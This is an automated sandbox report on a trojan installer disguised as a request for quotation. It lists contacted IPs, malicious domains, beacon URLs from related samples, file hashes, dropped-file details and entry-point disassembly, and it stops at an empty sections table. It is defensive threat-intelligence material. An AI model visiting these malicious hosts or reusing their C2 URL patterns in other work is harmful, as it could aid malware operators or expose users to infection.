Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | | high
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css | chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (listed three times) | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | | high
http://sitedesing.com/images/Asset | chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (listed three times) | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | RFQ-BCM 03122020.exe | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (listed three times) | unknown
http://sitedesing.com/404/ | chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (listed three times) | unknown
http://www.sajatypeworks.com | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (listed three times) | unknown
http://sitedesing.com/404.html/index.xml | chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.typography.netD | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (listed three times) | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (listed three times) | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (listed three times) | unknown
http://fontfabrik.com | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (listed three times) | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (listed three times) | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_Error | RFQ-BCM 03122020.exe | false | | high
https://opensource.keycdn.com/fontawesome/4.7.0/font-awesome.min.css | chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (listed three times) | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (listed three times) | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.fonts.com | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (listed three times) | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (listed three times) | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (listed three times) | unknown
http://www.sakkal.com | explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (listed three times) | unknown
https://cdnjs.cloudflare.com/ajax/libs/lunr.js/0.7.2/lunr.min.js | chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmp | false | | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
100.24.208.97 | s.multiscreensite.com | United States | 14618 | AMAZON-AESUS | false
192.0.78.24 | themiamadison.com | United States | 2635 | AUTOMATTICUS | true
103.28.148.178 | lippocaritahotel.com | Indonesia | 58477 | ARGON-AS-IDArgonDataCommunicationID | true
34.102.136.180 | jiltedowl.com | United States | 15169 | GOOGLEUS | false
154.216.127.214 | www.venturivasiljevic.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
172.67.193.107 | www.sitedesing.com | United States | 13335 | CLOUDFLARENETUS | true
44.227.65.245 | pixie.porkbun.com | United States | 16509 | AMAZON-02US | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 435309
Start date: 16.06.2021
Start time: 11:54:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 7s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: RFQ-BCM 03122020.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@14/7
EGA Information: Failed
HDC Information:
• Successful, ratio: 25.4% (good quality ratio 23.6%)
• Quality average: 77.8%
• Quality standard deviation: 28.9%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 40.88.32.150, 23.211.6.115, 104.43.193.48, 13.64.90.137, 23.211.4.86, 20.82.209.183, 51.103.5.159, 13.107.4.50, 20.82.210.154, 40.112.88.60, 80.67.82.211, 80.67.82.235
• Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, Edge-Prod-FRA.env.au.au-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, afdap.au.au-msedge.net, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, au.au-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net
• Not all processes were analyzed; the report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection
(each row is followed by its Context entry)
100.24.208.97 | SKMBT_C224307532DL23457845_Product Order doc.exe | malicious
• www.theruthyfoundation.com/ftgq/?C48xf8=VFQ8p8YH&8p=hXrrV6KmgNDYgaMusCisUpQaeMuXCQm/wDS3W/8bIiU7O/afikPnTfdtGvQUzT0iCOule4rqgA==
100.24.208.97 | 2a#U062c.exe | malicious
• www.theruthyfoundation.com/ftgq/?LZNd=hXrrV6KmgNDYgaMusCisUpQaeMuXCQm/wDS3W/8bIiU7O/afikPnTfdtGs89wTIaLtbz&MnZ=bjoxsdeh2XJx3v
100.24.208.97 | New Order.exe | malicious
• www.thedistrictatwestchester.com/ditf/?KvZpwPd=xqrQbuSug7mAeRb6s4MjD2XHIqcUYCAk+UoWKN0r4XMupSw1FqkJq36FBmsDIaKOVa+f&ARn=BjAtCdjxOrQ8pTgP
100.24.208.97 | purchase order PO#00011.exe | malicious
• www.johnnysappliancerepairs.com/amis/?r6A=HdPxEJnh&bj=zTtUbYOcJCdyZDGQWkPx4bEgpJYBwOrJPdPRmcYJS7VFwtD6RYZ6+7GYZtnd2PjK3too
100.24.208.97 | SAO_NCL INTER LOGISTICS (S) PTE LTD.exe | malicious
• www.4dig.net/vxwp/?FZU4DvG=Jh0YhcRqzYbzL8P5UXsQg/3UmJCgdgfp/exFxkxFO0tQIuC2rSWD5ZiJT/Z2JCDbuHKK&DzrTA=VDKPT4kXex_d1V
100.24.208.97 | yU6cC566nY.exe | malicious
• www.lavictoriaesdetodos.com/c239/?-ZYHTN2=lhSRtvpkm7zWY9pukIwOoQ3tVgpZpZX9v2vGgXkACtdBxIg9ivoRj9lL8ySJMzCNsF0l&LnHD=FZRHI6F8e0T
100.24.208.97 | 6eXBYoJuN9.exe | malicious
• www.worpar.com/tmz/?Qxo=0XCUnW1BdemwRGPf/XxJ89etllI9FJ7Vz6mkmkwCCm8whZ8W1fl3/XtrociuLyPbaedFI5bdsA==&MJBD=FdFt3xJhxzShbFHP
100.24.208.97 | Emc00X3KDo.exe | malicious
• www.bit-coin-b2b.com/i032/
100.24.208.97 | lbqFKoALqe.exe | malicious
• www.stattests.com/csv8/?8pHXLLhp=SBCaTdph9BFJ+Pe0Ht/T56OwK5/x5qMPVV3KW1n9WrjJ2bCqa9ZEsGfiasNAsnzHUsjd&hbs=CnehJPdp6XLP_rwP
100.24.208.97 | Doc_37584567499454.xlsx | malicious
• www.stattests.com/csv8/?l48tdRq0=SBCaTdpk9GFN+fS4Ft/T56OwK5/x5qMPVVvaK278SLjI2qusdtII6CngZJh83HH0bt2tCA==&RF=fra8
100.24.208.97 | EK6BR1KS50.exe | malicious
• www.stattests.com/csv8/?MZBL=SBCaTdph9BFJ+Pe0Ht/T56OwK5/x5qMPVV3KW1n9WrjJ2bCqa9ZEsGfiasNqzXDHQurd&u6Td=cjot_nZ0td0D1F
100.24.208.97 | Companyprofile_Order_384658353.xlsx | malicious
• www.stattests.com/csv8/?mJ=SBCaTdpk9GFN+fS4Ft/T56OwK5/x5qMPVVvaK278SLjI2qusdtII6CngZJh83HH0bt2tCA==&rDHxi=mrj07b-h
100.24.208.97 | New Purchase Order 501,689$.exe | malicious
• www.cvbtrading.co.uk/eao/?4h0=lAvpzUGX9KkW6YMY4D87DWjr1D7s54+nPDPuw1k95OdnWwCj2pM4Ft1Y7NJ2d65wIUfg&wR=OtxhY2
100.24.208.97 | New Purchase Order 50,689$.exe | malicious
• www.cvbtrading.co.uk/eao/?p0D=lAvpzUGX9KkW6YMY4D87DWjr1D7s54+nPDPuw1k95OdnWwCj2pM4Ft1Y7NF2Oq1zREf2MnJCBg==&tFQh=XRclsNQPL8U
100.24.208.97 | New Purchase Order 50,689$.exe | malicious
• www.cvbtrading.co.uk/eao/?Yvux40tX=lAvpzUGX9KkW6YMY4D87DWjr1D7s54+nPDPuw1k95OdnWwCj2pM4Ft1Y7OpMNrZISz+n&Pp=jfLprdxxs
100.24.208.97 | Eurobank Transaction.exe | malicious
• www.janewagtus.com/3nop/?Jlq=Z0G4H2Jhj&_zuLcVAp=XwQEFbPdAe8RC3KQJUbvaT4aerhUkRg+DnVMzGambLllbqglBOjO8af2J4RSYf9mQ0RS
100.24.208.97 | http://www.rejuvenatemedicalspa.net | malicious
• www.rejuvenatemedicalspa.net/
100.24.208.97 | 15Purchase.exe | malicious
• www.butaeventscatering.com/bu/?9r3l=YiEFMluwGnBmHitO4gsciCUePvQdW+NV5cUtbNa8QVlRAP8AMA28Ps0l1rVepT5RTkfVLUab7+a340LaQn7w&3fpTd=TL0xlp5HqjmHdV
192.0.78.24 | Payment copy_MT103_9847.exe | malicious
• www.jornadadeproposito.com/p6nu/?5jYLcPK=KtXlZG1MDOZFWP5t9YcyG1YTs743rvCOSznZGD3YxkY1/Yc+FQIWM8xCgyvVxNimUsWE&X8mhB2=5jkpX2b8GHg
192.0.78.24 | Gz98aWSGb5.exe | malicious
• www.unapersonaestabien.com/m3rc/?_BZ=o7izuhN0eiDBtRVTd1lDz6WKoPkNEuauPIN5CezYSPQXzsgO8JvVj8I3N0VIsRkybf5kH8xatg==&i48XM4=6lXxZB08
192.0.78.24 | LEMO.exe | malicious
• www.winterpublishinghouse.com/aipc/?f6A8Sz=Z9mnZyfY5CpLAzXPPb3enFLkttc7m+LSSJAo0MNQKNo/LlAoS/712uitoBhdXpdyq+qb&sDKp4l=3fHXUDz8CN-
192.0.78.24 | 1.exe | malicious
• www.acrostuttgart.com/u6e4/?hb9Xz=Yhu6TshARwIoNbZ1x2iC8x1g/pbDvoJ9Rk8hKXUW+vXycfOoNZe1P9zxob48TjTPlsWA&c8=JDK0FTTh_xKtI4B
192.0.78.24 | rtgs_2021-06-07_02-01.exe | malicious
• www.easynlean.com/uecu/?3f30dp=Zf0HXpXHq84PAdrP&E4k=F8016VyzM1JTHnrEuGu47WSgGKrxD9PfY9mcGh42htmqMoXzmTppL0JZy4KDS3X6tRzp
192.0.78.24 | ] New Order Vung Ang TPP Viet Nam.exe | malicious
• www.mykiwidesign.com/un8c/?8p=shtUrfI/xlBO8C2aliNZenIpYotasWnDtIq4lctURnres2cu8VpZnDv2KHIrTwDBcoSX&h6Z=FZOTUTGPt4-
192.0.78.24 | STATEMENT.exe | malicious
• www.vrvvrf.com/s5cm/?7nwhw=m8vN0kLa85K6oU4T+ITvevq7r3PYb0uvJBSJVcJsVJjYueOzrA4fHZ5+1OOIPpyaNc8F&ML=EZBXFN7pQ8l
192.0.78.24 | LQrGhleECP.exe | malicious
• www.philreid4cc.com/dxe/?W8Mp8l=s4725d3Oabb4GJPvvzs1NGtrQqdCSFbT14B5hiC+hEbCkkM6v8NMU0M9YE5BiqTyeHs9&j6t4MD=ktcPu
192.0.78.24 | 003 SOA.exe | malicious
                                                                                • www.thortcircuit.com/hme1/?6l-x=2YNiVCg1HFxx3pWBlJet9DA2QXWGNYZsyAyNRB+QsGrDR5moNFNVdH9eeZdldT++LaB4&q450=lHkpfvh8-6gxYnb
                                                                                Bank transfer copy.xlsxGet hashmaliciousBrowse
                                                                                • www.letsreflectonline.net/xkcp/
                                                                                RE KOC RFQ for Flanges - RFQ 2074898.exeGet hashmaliciousBrowse
                                                                                • www.acrostuttgart.com/u6e4/?u6u0=Yhu6TshARwIoNbZ1x2iC8x1g/pbDvoJ9Rk8hKXUW+vXycfOoNZe1P9zxob48TjTPlsWA&9rQl7=xP04lrqp
                                                                                rove.exeGet hashmaliciousBrowse
                                                                                • www.winterpublishinghouse.com/aipc/?bv4=Z9mnZyfY5CpLAzXPPb3enFLkttc7m+LSSJAo0MNQKNo/LlAoS/712uitoCBNYINK0bDc&6lSp=ArO83PE0Mh0TtZa0
                                                                                SHIPPING DOCUMENT_7048555233PDF.exeGet hashmaliciousBrowse
                                                                                • www.annafelicia.com/s5cm/?p0G=ndfPKtxxGRrhJ&jrTDmX=hOQz2MSCtbsxDabSpaSii8/BLtQrJH/yS4IrOYS2fNok4Vr2pjerCtCMkXjIcTV9nsbq
                                                                                USU(1).exeGet hashmaliciousBrowse
                                                                                • www.thegreenpandablog.com/zrmt/?P0G=EjUHInR&9r7T-=J09lyTGn9S5rIToQcgF0c51IGS+OfxW0xoKNzG6aM/w/AgGV1VzZrO0ZiJtbcGpPM5Lb
                                                                                Purchase Order.pdf.exeGet hashmaliciousBrowse
                                                                                • www.abemedia.digital/gad0/?1bB=/+tCXqr0gdanEXIrEzSrj72VRhl5gvMKZr+3SkiVsUrE8Neij8YjDVUIRA4MYZFQuvm8&3fS=dfc8-RnPKT4
                                                                                REQUEST_QUOTATION.exeGet hashmaliciousBrowse
                                                                                • www.leetranscreations.com/owws/?wh=aFXjGSNeyc6Ugx97af8VQ8VI0qEUD4Nx9YtV38rOMEW/LmZ8Os3H8FDEWrOsqvRI5MwQ&Sh=CpCLnL8
                                                                                Pdf MT103 - Remittance.pdf.exeGet hashmaliciousBrowse
                                                                                • www.vrvvrf.com/s5cm/?kR-4q=m8vN0kLa85K6oU4T+ITvevq7r3PYb0uvJBSJVcJsVJjYueOzrA4fHZ5+1OCIc5+ZUM8Ty3WWlQ==&P0D=Atxturd
                                                                                Inv3063200.exeGet hashmaliciousBrowse
                                                                                • www.sebastiansanchezgonzalez.com/vfm2/?k2MdtP=dk6o8Jn40n+32krysyfR8rO7wNHyWZLWF1780NbDI2i8UvXeeWH5XDxm9NpiB8EhKtTZ&NZitYp=zL3h2V_pyz
                                                                                CONTRACT RFQ.xlsxGet hashmaliciousBrowse
                                                                                • www.micheldrake.com/p2io/?y488S=6l58NVGphzNX&LPRlm=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==
                                                                                noSpfWQqRD.exeGet hashmaliciousBrowse
                                                                                • www.micheldrake.com/p2io/?lZB=UFQxwXQ82Xg4fjY&ndphCh4=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+a1Y8u0zs/SS1CQHpw==

Domains


ASN


JA3 Fingerprints

No context

Dropped Files


Created / dropped Files

C:\Users\user\AppData\Local\Temp\1z5waydzpi63ss5egqv
Process: C:\Users\user\Desktop\RFQ-BCM 03122020.exe
File Type: data
Category: dropped
Size (bytes): 164352
Entropy (8bit): 7.998930773810573
Encrypted: true
SSDEEP: 3072:RW0+oa3GvcnS4QUj8vGGdM/5nNmpuqpFJrKjoL94Q1a17q+njTnaMFNuOXL:RWkaWUhQu2unNCuqToj894c673nHa4cW
MD5: 6F720D598D207B318013A948EFC4916A
SHA1: 104B5232C72E1FE460838FE081E5001504236D06
SHA-256: 391B30020602EBBB3E0B5FDF30D606438ADC593B4F572A7AE391F7B2D004ED46
SHA-512: 3BA2EAE144375F185A88B630232676AB0F098299E25F736CF330C4ECF87FF2D99C391118334075C6AA52515081FCF897CE4BE343E00EA41496AA2B9FA2042258
Malicious: false
Reputation: low
                                                                                                                        C:\Users\user\AppData\Local\Temp\nsuBF4B.tmp\System.dll
                                                                                                                        Process:C:\Users\user\Desktop\RFQ-BCM 03122020.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11776
                                                                                                                        Entropy (8bit):5.855045165595541
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                                        MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                                        SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                                        SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                                        SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Metadefender, Detection: 0%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: 7ujc2szSQX.exe, Detection: malicious
                                                                                                                        • Filename: TT0900090000090.exe, Detection: malicious
                                                                                                                        • Filename: Poczta Polska Informacje o transakcjach2021.exe, Detection: malicious
                                                                                                                        • Filename: PO-006 dtd-15.06.2021.exe, Detection: malicious
                                                                                                                        • Filename: SKM_4050210326102400 jpg.exe, Detection: malicious
                                                                                                                        • Filename: IMGG087 76543.exe, Detection: malicious
                                                                                                                        • Filename: yfr02XrveJ.exe, Detection: malicious
                                                                                                                        • Filename: LCdraft6152021_pdf.exe, Detection: malicious
                                                                                                                        • Filename: LCdraft6152021_pdf.exe, Detection: malicious
                                                                                                                        • Filename: Consigment Details_pdf.exe, Detection: malicious
                                                                                                                        • Filename: bigfish.exe, Detection: malicious
                                                                                                                        • Filename: INQUIRY for IFM 20207.xlsx, Detection: malicious
                                                                                                                        • Filename: gz7dLhKlSQ.exe, Detection: malicious
                                                                                                                        • Filename: WGOc4eHYqX.exe, Detection: malicious
                                                                                                                        • Filename: Purchase_Order.xlsx, Detection: malicious
                                                                                                                        • Filename: ojmanoq.exe, Detection: malicious
                                                                                                                        • Filename: linkfuq.exe, Detection: malicious
                                                                                                                        • Filename: takwqaytr.exe, Detection: malicious
                                                                                                                        • Filename: PO_403.xlsx, Detection: malicious
                                                                                                                        • Filename: Purchase_Order_150621.xlsx, Detection: malicious
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        C:\Users\user\AppData\Local\Temp\tqkpaveks
                                                                                                                        Process:C:\Users\user\Desktop\RFQ-BCM 03122020.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):56993
                                                                                                                        Entropy (8bit):4.968118288232998
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:clYo0jQ2976D2I0LGt3jle1/fBD5TVQ+Ra:AjJKfG5e1/5Do+I
                                                                                                                        MD5:A102679195215C4D8C0D2268D893BFAD
                                                                                                                        SHA1:CCC042C16220FDDFCC4305D65B5E388B78C7ECD4
                                                                                                                        SHA-256:CEA09A342F707129F978EEDB8AB69E5DE167DD7E6387CE499E543272B69B7357
                                                                                                                        SHA-512:696F11D4B7CB2D85276D9D6306A97FDAD50F68A0073AA3EDCBAE843D801ED294A6CED9225D92A8050181D29755308D1B5B73E7D30D7259D7CF028C4734C10239
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Entropy (8bit):7.902952243402125
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:RFQ-BCM 03122020.exe
                                                                                                                        File size:222795
                                                                                                                        MD5:d3d5e6cafa8ca89384e56e6374a14203
                                                                                                                        SHA1:ba57aa266efd34ec5fe657c13ecda85e97ad5b5c
                                                                                                                        SHA256:214910524a528bab8dae4a704169e20d9f2f92444df6e6a65d19decafd9f69b0
                                                                                                                        SHA512:615e3abe07739af22fea6ba66b7d54f83652704adc237ef7ff3c21780e23d11bec7bab1f9b58e4c6cf0aed54b2fc9ba697520b18618bde88613bb07294c10cd6
                                                                                                                        SSDEEP:6144:cQqTvWkaWUhQu2unNCuqToj894c673nHa4c0t:yvWkpUEu/AHYvco

                                                                                                                        File Icon

                                                                                                                        Icon Hash:b2a88c96b2ca6a72

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x4030cb
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x4B1AE3C1 [Sat Dec 5 22:50:41 2009 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:7fa974366048f9c551ef45714595665e

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        sub esp, 00000180h
                                                                                                                        push ebx
                                                                                                                        push ebp
                                                                                                                        push esi
                                                                                                                        xor ebx, ebx
                                                                                                                        push edi
                                                                                                                        mov dword ptr [esp+18h], ebx
                                                                                                                        mov dword ptr [esp+10h], 00409160h
                                                                                                                        xor esi, esi
                                                                                                                        mov byte ptr [esp+14h], 00000020h
                                                                                                                        call dword ptr [00407030h]
                                                                                                                        push 00008001h
                                                                                                                        call dword ptr [004070B0h]
                                                                                                                        push ebx
                                                                                                                        call dword ptr [0040727Ch]
                                                                                                                        push 00000008h
                                                                                                                        mov dword ptr [00423F38h], eax
                                                                                                                        call 00007F1A68A19336h
                                                                                                                        mov dword ptr [00423E84h], eax
                                                                                                                        push ebx
                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                        push 00000160h
                                                                                                                        push eax
                                                                                                                        push ebx
                                                                                                                        push 0041F430h
                                                                                                                        call dword ptr [00407158h]
                                                                                                                        push 00409154h
                                                                                                                        push 00423680h
                                                                                                                        call 00007F1A68A18FE9h
                                                                                                                        call dword ptr [004070ACh]
                                                                                                                        mov edi, 00429000h
                                                                                                                        push eax
                                                                                                                        push edi
                                                                                                                        call 00007F1A68A18FD7h
                                                                                                                        push ebx
                                                                                                                        call dword ptr [0040710Ch]
                                                                                                                        cmp byte ptr [00429000h], 00000022h
                                                                                                                        mov dword ptr [00423E80h], eax
                                                                                                                        mov eax, edi
                                                                                                                        jne 00007F1A68A1674Ch
                                                                                                                        mov byte ptr [esp+14h], 00000022h
                                                                                                                        mov eax, 00429001h
                                                                                                                        push dword ptr [esp+14h]
                                                                                                                        push eax
                                                                                                                        call 00007F1A68A18ACAh
                                                                                                                        push eax
                                                                                                                        call dword ptr [0040721Ch]
                                                                                                                        mov dword ptr [esp+1Ch], eax
                                                                                                                        jmp 00007F1A68A167A5h
                                                                                                                        cmp cl, 00000020h
                                                                                                                        jne 00007F1A68A16748h
                                                                                                                        inc eax
                                                                                                                        cmp byte ptr [eax], 00000020h
                                                                                                                        je 00007F1A68A1673Ch
                                                                                                                        cmp byte ptr [eax], 00000022h
                                                                                                                        mov byte ptr [eax+eax+00h], 00000000h

                                                                                                                        Rich Headers

                                                                                                                        Programming Language:
                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                        Data Directories

                                                                                                                        Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT          0x73a4           0xb4          .rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE        0x2c000          0xc68         .rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT             0x7000           0x28c         .rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                                                        Sections

                                                                                                                        Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
